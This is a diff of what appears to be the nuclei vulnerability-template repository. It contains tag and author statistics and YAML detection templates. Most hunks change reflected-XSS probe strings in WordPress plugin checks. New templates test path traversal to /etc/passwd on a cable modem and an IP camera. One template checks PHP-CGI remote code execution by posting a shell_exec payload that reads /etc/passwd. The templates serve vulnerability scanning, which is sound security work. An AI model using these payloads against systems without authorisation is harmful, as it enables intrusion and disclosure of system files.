| dom | 1 | | | | | | | | |
| centos | 1 | | | | | | | | |
| fortinet | 1 | | | | | | | | |
| memcached | 1 | | | | | | | | |
| avtech | 1 | | | | | | | | |
| lancom | 1 | | | | | | | | |
| jenkin | 1 | | | | | | | | |
| javascript | 1 | | | | | | | | |
| fortigates | 1 | | | | | | | | |
| apiman | 1 | | | | | | | | |
| clave | 1 | | | | | | | | |
| mediumish | 1 | | | | | | | | |
| jsf | 1 | | | | | | | | |
| landray | 1 | | | | | | | | |
| tensorboard | 1 | | | | | | | | |
| pulsesecure | 1 | | | | | | | | |
| socomec | 1 | | | | | | | | |
| blind | 1 | | | | | | | | |
| turbocrm | 1 | | | | | | | | |
| swagger | 1 | | | | | | | | |
| npm | 1 | | | | | | | | |
| tensorflow | 1 | | | | | | | | |
| ssltls | 1 | | | | | | | | |
| wso2 | 1 | | | | | | | | |
| fastapi | 1 | | | | | | | | |
| webadmin | 1 | | | | | | | | |
| kafdrop | 1 | | | | | | | | |
| episerver | 1 | | | | | | | | |
| circontrorl | 1 | | | | | | | | |
| ambari | 1 | | | | | | | | |
| crm | 1 | | | | | | | | |
| comodo | 1 | | | | | | | | |
| tamronos | 1 | | | | | | | | |
| cve2007 | 1 | | | | | | | | |
| rdp | 1 | | | | | | | | |
| jmx | 1 | | | | | | | | |
| avalanche | 1 | | | | | | | | |
| embedthis | 1 | | | | | | | | |
| goahead | 1 | | | | | | | | |
| k8s | 1 | | | | | | | | |
| gitlist | 1 | | | | | | | | |
| fedora | 1 | | | | | | | | |
| mongo | 1 | | | | | | | | |
| aura | 1 | | | | | | | | |
| axis | 1 | | | | | | | | |
| node-red-dashboard | 1 | | | | | | | | |
| discourse | 1 | | | | | | | | |
| powercreator | 1 | | | | | | | | |
| zarafa | 1 | | | | | | | | |
| dvwa | 1 | | | | | | | | |
| opencast | 1 | | | | | | | | |
| payara | 1 | | | | | | | | |
| nomad | 1 | | | | | | | | |
| upnp | 1 | | | | | | | | |
| plastic | 1 | | | | | | | | |
| bruteforce | 1 | | | | | | | | |
| wildfly | 1 | | | | | | | | |
| ruby | 1 | | | | | | | | |
| livezilla | 1 | | | | | | | | |
| panabit | 1 | | | | | | | | |
| shopware | 1 | | | | | | | | |
| linkedin | 1 | | | | | | | | |
| vsphere | 1 | | | | | | | | |
| netsweeper | 1 | | | | | | | | |
| spectracom | 1 | | | | | | | | |
| geutebruck | 1 | | | | | | | | |
| weiphp | 1 | | | | | | | | |
| jfrog | 1 | | | | | | | | |
| dompdf | 1 | | | | | | | | |
| mautic | 1 | | | | | | | | |
| labtech | 1 | | | | | | | | |
| selea | 1 | | | | | | | | |
| sentry | 1 | | | | | | | | |
| sarg | 1 | | | | | | | | |
| flash | 1 | | | | | | | | |
| zimbra | 1 | | | | | | | | |
| fortigate | 1 | | | | | | | | |
| cgi | 1 | | | | | | | | |
| kubeflow | 1 | | | | | | | | |
| kong | 1 | | | | | | | | |
| nedi | 1 | | | | | | | | |
| esmtp | 1 | | | | | | | | |
| monitorix | 1 | | | | | | | | |
| salesforce | 1 | | | | | | | | |
| woocomernce | 1 | | | | | | | | |
| jquery | 1 | | | | | | | | |
| drone | 1 | | | | | | | | |
| tongda | 1 | | | | | | | | |
| k8 | 1 | | | | | | | | |
| csod | 1 | | | | | | | | |
| wp-theme | 1 | | | | | | | | |
| tileserver | 1 | | | | | | | | |
| traefik | 1 | | | | | | | | |
| moin | 1 | | | | | | | | |
| moinmoin | 1 | | | | | | | | |
| liferay | 1 | | | | | | | | |
| timesheet | 1 | | | | | | | | |
| phpunit | 1 | | | | | | | | |
| rabbitmq | 1 | | | | | | | | |
| netdata | 1 | | | | | | | | |
| redis | 1 | | | | | | | | |
| cloudinary | 1 | | | | | | | | |
| zeroshell | 1 | | | | | | | | |
| linkerd | 1 | | | | | | | | |
| svn | 1 | | | | | | | | |
| druid | 1 | | | | | | | | |
| sitecore | 1 | | | | | | | | |
| plugin | 1 | | | | | | | | |
| blackboard | 1 | | | | | | | | |
| jitsi | 1 | | | | | | | | |
| b2evolution | 1 | | | | | | | | |
| clusterengine | 1 | | | | | | | | |
| plc | 1 | | | | | | | | |
| htmli | 1 | | | | | | | | |
| tapestry | 1 | | | | | | | | |
| gloo | 1 | | | | | | | | |
| haproxy | 1 | | | | | | | | |
| gridx | 1 | | | | | | | | |
| spidercontrol | 1 | | | | | | | | |
| dotnet | 1 | | | | | | | | |
| rfi | 1 | | | | | | | | |
| springframework | 1 | | | | | | | | |
| hasura | 1 | | | | | | | | |
| pippoint | 1 | | | | | | | | |
| skywalking | 1 | | | | | | | | |
| rubedo | 1 | | | | | | | | |
| diris | 1 | | | | | | | | |
| pyramid | 1 | | | | | | | | |
| biometrics | 1 | | | | | | | | |
| wmt | 1 | | | | | | | | |
| appweb | 1 | | | | | | | | |
| zend | 1 | | | | | | | | |
| etouch | 1 | | | | | | | | |
| codeigniter | 1 | | | | | | | | |
| bolt | 1 | | | | | | | | |
| 2014 | 1 | | | | | | | | |
| tpshop | 1 | | | | | | | | |
| timeclock | 1 | | | | | | | | |
| mpsec | 1 | | | | | | | | |
| symfony | 1 | | | | | | | | |
| webftp | 1 | | | | | | | | |
| mcafee | 1 | | | | | | | | |
| acme | 1 | | | | | | | | |
| mysql | 1 | | | | | | | | |
| klog | 1 | | | | | | | | |
| spring | 1 | | | | | | | | |
| geddy | 1 | | | | | | | | |
| finereport | 1 | | | | | | | | |
| cors | 1 | | | | | | | | |
| emby | 1 | | | | | | | | |
| cve2005 | 1 | | | | | | | | |
| backdoor | 1 | | | | | | | | |
| idemia | 1 | | | | | | | | |
| robomongo | 1 | | | | | | | | |
| blue-ocean | 1 | | | | | | | | |
| horde | 1 | | | | | | | | |
| phpinfo | 1 | | | | | | | | |
| vsftpd | 1 | | | | | | | | |
| ems | 1 | | | | | | | | |
| rujjie | 1 | | | | | | | | |
| pgadmin | 1 | | | | | | | | |
| ioncube | 1 | | | | | | | | |
| wazuh | 1 | | | | | | | | |
| nordex | 1 | | | | | | | | |
| status | 1 | | | | | | | | |
| cse | 1 | | | | | | | | |
| viewpoint | 1 | | | | | | | | |
| proftpd | 1 | | | | | | | | |
| kyan | 1 | | | | | | | | |
| firebase | 1 | | | | | | | | |
| targa | 1 | | | | | | | | |
| acexy | 1 | | | | | | | | |
| codemeter | 1 | | | | | | | | |
| redwood | 1 | | | | | | | | |
| heroku | 1 | | | | | | | | |
| alibaba | 1 | | | | | | | | |
| arl | 1 | | | | | | | | |
| circontrol | 1 | | | | | | | | |
| lotuscms | 1 | | | | | | | | |
| jeewms | 1 | | | | | | | | |
| zenario | 1 | | | | | | | | |
| zm | 1 | | | | | | | | |
| emc | 1 | | | | | | | | |
| ulterius | 1 | | | | | | | | |
| ricoh | 1 | | | | | | | | |
| triconsole | 1 | | | | | | | | |
| anchorcms | 1 | | | | | | | | |
| email | 1 | | | | | | | | |
| synnefo | 1 | | | | | | | | |
| viewlinc | 1 | | | | | | | | |
| wuzhicms | 1 | | | | | | | | |
| subrion | 1 | | | | | | | | |
| wiki | 1 | | | | | | | | |
| saltapi | 1 | | | | | | | | |
| nc2 | 1 | | | | | | | | |
| postgres | 1 | | | | | | | | |
| eyou | 1 | | | | | | | | |
| pacsone | 1 | | | | | | | | |
| plone | 1 | | | | | | | | |
| sidekiq | 1 | | | | | | | | |
| tenda | 1 | | | | | | | | |
| zookeeper | 1 | | | | | | | | |
| ueditor | 1 | | | | | | | | |
| wooyun | 1 | | | | | | | | |
| opensns | 1 | | | | | | | | |
| wamp | 1 | | | | | | | | |
| ec2 | 1 | | | | | | | | |
| totaljs | 1 | | | | | | | | |
| ganglia | 1 | | | | | | | | |
| rhymix | 1 | | | | | | | | |
| shopxo | 1 | | | | | | | | |
| wifisky | 1 | | | | | | | | |
| wavemaker | 1 | | | | | | | | |
| krweb | 1 | | | | | | | | |
| rmc | 1 | | | | | | | | |
| mdb | 1 | | | | | | | | |
| clockwatch | 1 | | | | | | | | |
| mobileiron | 1 | | | | | | | | |
| adminer | 1 | | | | | | | | |
| yachtcontrol | 1 | | | | | | | | |
| zte | 1 | | | | | | | | |
| igs | 1 | | | | | | | | |
| duomicms | 1 | | | | | | | | |
| landrayoa | 1 | | | | | | | | |
| xdcms | 1 | | | | | | | | |
| mara | 1 | | | | | | | | |
| thinkadmin | 1 | | | | | | | | |
| cloudflare | 1 | | | | | | | | |
| db | 1 | | | | | | | | |
| bookstack | 1 | | | | | | | | |
| szhe | 1 | | | | | | | | |
| fastcgi | 1 | | | | | | | | |
| dvr | 1 | | | | | | | | |
| starttls | 1 | | | | | | | | |
| seacms | 1 | | | | | | | | |
| glances | 1 | | | | | | | | |

12
TOP-10.md Normal file
View File

@ -0,0 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 |
| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 |
| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 |
| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 |
| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | |
| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | |
| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | |
| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | |
| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | |
| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | |

View File

@ -0,0 +1,26 @@
id: CVE-2010-2307
info:
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
reference: |
- https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
tags: cve,cve2010,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: CVE-2010-4231
info:
name: Camtron CMNC-200 IP Camera - Directory Traversal
author: daffainfo
severity: high
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
tags: cve,cve2010,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -0,0 +1,35 @@
id: CVE-2012-1823
info:
name: PHP CGI v5.3.12/5.4.2 RCE
author: pikpikcu
severity: critical
reference: |
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
- https://nvd.nist.gov/vuln/detail/CVE-2012-1823
description: |
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
tags: rce,php,cve,cve2012
requests:
- raw:
- |
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
<?php echo shell_exec("cat /etc/passwd"); ?>
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status
status:
- 200

View File

@ -11,7 +11,7 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
@ -21,7 +21,7 @@ requests:
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img/src=x onerror=alert(123)>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<ScrIpT>alert(123)</ScrIpT>"
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
part: body
- type: word

View File

@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E'
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</textarea></script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -0,0 +1,30 @@
id: CVE-2016-1000127
info:
name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin ajax-random-post v2.00
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported"
- "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C"
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
- "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
- "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -2,7 +2,7 @@ id: CVE-2016-10956
info:
name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
author: daffainfo,0x240x23elu
severity: high
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -13,7 +13,7 @@ info:
requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
